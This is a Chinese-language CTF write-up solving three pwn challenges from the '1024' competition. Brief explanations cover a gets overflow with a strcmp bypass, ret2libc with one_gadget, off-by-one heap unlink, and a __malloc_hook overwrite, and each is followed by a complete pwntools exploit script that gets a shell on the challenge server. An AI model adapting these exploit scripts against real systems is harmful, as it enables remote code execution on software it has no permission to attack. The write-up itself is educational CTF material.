0%

1024杯

5f87fd071a777.jpg

1024_happy_stack

发现程序存在gets函数,'36D'+'\x00'绕过strcmp,然后溢出覆盖返回地址,首先泄露libc,然后同样得方法,利用one_gadget来getshell。一开始用system函数,发现一直出错,最后直接不管了,one_gadget一把梭。提交完群里师傅说可以多加一个ret,进行栈对齐,学到了,学到了。

exp如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
#! /usr/bin/env python

from pwn import *
from LibcSearcher import *

#sh=process('./pwn1')
sh=remote('111.231.70.44',28018)
elf=ELF('./pwn1')
libc=ELF('./libc6_2.27-3ubuntu1_amd64.so')
context.log_level='debug'

puts_plt = elf.plt['puts']
puts_got=elf.got['puts']
main_addr = 0x00000000004005A0
pop_rdi_ret=0x0000000000400803
pop_rsi_r15_ret=0x0000000000400801
payload ='36D'+'\x00'+'a'*0x384
payload+=p64(pop_rdi_ret)+p64(puts_got)+p64(puts_plt)+p64(main_addr)

sh.sendline(payload)
sh.recvuntil('36D\n')
puts_addr=u64(sh.recv(6).ljust(8,'\x00'))
sh.success('puts_addr : ' +hex(puts_addr))
libc_base = puts_addr-libc.symbols['puts']
sh.success('libc_base : ' +hex(libc_base))
one_gadget=libc_base+0x4f2c5

payload ='36D'+'\x00'+'\x00'*0x384
payload+=p64(one_gadget)

sleep(0.5)
sh.sendline(payload)
sh.interactive()

1024_happy_checkin

和第一个题一样,one_gadget一把梭。

exp如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
#! /usr/bin/env python

from pwn import *
from LibcSearcher import *

#sh=process('./pwn2')
sh=remote('111.231.70.44',28028)
elf=ELF('./pwn2')
libc=ELF('./libc6_2.27-3ubuntu1_amd64.so')
context.log_level='debug'

puts_plt = elf.plt['puts']
puts_got=elf.got['puts']
main_addr = 0x00000000004005F7
pop_rdi_ret=0x00000000004006e3

payload ='a'*0x370+'b'*0x8
payload+=p64(pop_rdi_ret)+p64(puts_got)+p64(puts_plt)+p64(main_addr)
sh.sendline(payload)
sh.recvuntil('b'*8)
puts_addr=u64(sh.recvuntil('\x7f')[-6:].ljust(8,'\x00'))
sh.success('puts_addr : ' +hex(puts_addr))
libc_base=puts_addr-libc.symbols['puts']
one_gadget=libc_base+0x4f2c5

payload ='a'*0x370+'a'*8
payload+=p64(one_gadget)

sleep(0.5)
sh.sendline(payload)
sh.interactive()

程序存在off by one 漏洞,伪造fake_chunk,触发unlink,然后修改chunk_ptr为got地址,通过show函数泄露libc,修改free_got为system_addr,再次free就会getshell。需要注意得是,在做题的时候,我用题目给得libc,远程一直打不通,最后根据泄露得got地址,网上查了相应libc才得以打通,感觉是不是libc有问题。。。。

exp如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
#! /usr/bin/env python

from pwn import *

#sh=process('./pwn3')
sh=remote('111.231.70.44',28048)
elf=ELF('./pwn3')
context.log_level='debug'
#libc=ELF('./libc.so.6')

def add(index,size):
sh.recvuntil(': ')
sh.sendline('1')
sh.recvuntil('idx: ')
sh.sendline(str(index))
sh.recvuntil(': ')
sh.sendline(str(size))

def free(index):
sh.recvuntil(': ')
sh.sendline('2')
sh.recvuntil('idx: ')
sh.sendline(str(index))

def show(index):
sh.recvuntil(': ')
sh.sendline('3')
sh.recvuntil('idx: ')
sh.sendline(str(index))

def edit(index,content):
sh.recvuntil(': ')
sh.sendline('4')
sh.recvuntil('idx: ')
sh.sendline(str(index))
sh.recvuntil(': ')
sh.send(content)

chunk_ptr=0x6020f0
fd=chunk_ptr-0x18
bk=chunk_ptr-0x10
free_got=elf.got['free']
puts_got=elf.got['puts']
puts_plt=elf.plt['puts']

add(0,0x60)
add(1,0x88)
add(2,0x80)
add(3,'/bin/sh\x00')
edit(1,p64(0)+p64(0x81)+p64(fd)+p64(bk)+'a'*0x60+p64(0x80)+'\x90')
free(2)
edit(1,'a'*0x8+p64(free_got)+p64(puts_got))
show(0)
free_addr=u64(sh.recv(6).ljust(8,'\x00'))
sh.success('free_addr : ' +hex(free_addr))

libc_base=free_addr-0x0844f0
sh.success('libc_base : ' +hex(libc_base))
system_addr=libc_base+0x045390
sh.success('system_addr : ' +hex(system_addr))

edit(0,p64(system_addr))
edit(3,'/bin/sh\x00')
free(3)

#gdb.attach(sh)
sh.interactive()

这里我还用了另一种方法,非预期???

通过off by one 漏洞修改 chunk_size,照成堆重叠,然后泄露libc,之后将chunk申请到malloc_hook,利用one_gadget来getshell。

exp如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
#! /usr/bin/env python

from pwn import *

#sh=process('./pwn3')
sh=remote('111.231.70.44',28016)
elf=ELF('./pwn3')
context.log_level='debug'
libc=ELF('./libc6_2.23-0ubuntu10_amd64.so')

def add(index,size):
sh.recvuntil(': ')
sh.sendline('1')
sh.recvuntil('idx: ')
sh.sendline(str(index))
sh.recvuntil(': ')
sh.sendline(str(size))

def free(index):
sh.recvuntil(': ')
sh.sendline('2')
sh.recvuntil('idx: ')
sh.sendline(str(index))

def show(index):
sh.recvuntil(': ')
sh.sendline('3')
sh.recvuntil('idx: ')
sh.sendline(str(index))

def edit(index,content):
sh.recvuntil(': ')
sh.sendline('4')
sh.recvuntil('idx: ')
sh.sendline(str(index))
sh.recvuntil(': ')
sh.send(content)

add(0,0x18)
add(1,0x60)
add(2,0x60)
add(3,0x10)
edit(0,'a'*0x18+'\xe1')
free(1)
add(4,0x60)
show(2)
main_arena=u64(sh.recv(6).ljust(8,'\x00'))-88
sh.success('main_arena : ' +hex(main_arena))
libc_base=main_arena-0x3c4b20
sh.success('libc_base : ' +hex(libc_base))
malloc_hook=libc_base+libc.symbols['__malloc_hook']
sh.success('malloc_hook : ' +hex(malloc_hook))
one_gadget=libc_base+0xf1147
realloc=libc_base+libc.symbols['realloc']

add(5,0x60)
free(5)
edit(2,p64(malloc_hook-0x23))
add(6,0x60)
add(7,0x60)
edit(7,'a'*3+p64(0)*2+p64(one_gadget))

sh.recvuntil(': ')
sh.sendline('1')
sh.recvuntil('idx: ')
sh.sendline(str(1))
sh.recvuntil(': ')
sh.sendline(str(0x20))

#gdb.attach(sh)
sh.interactive()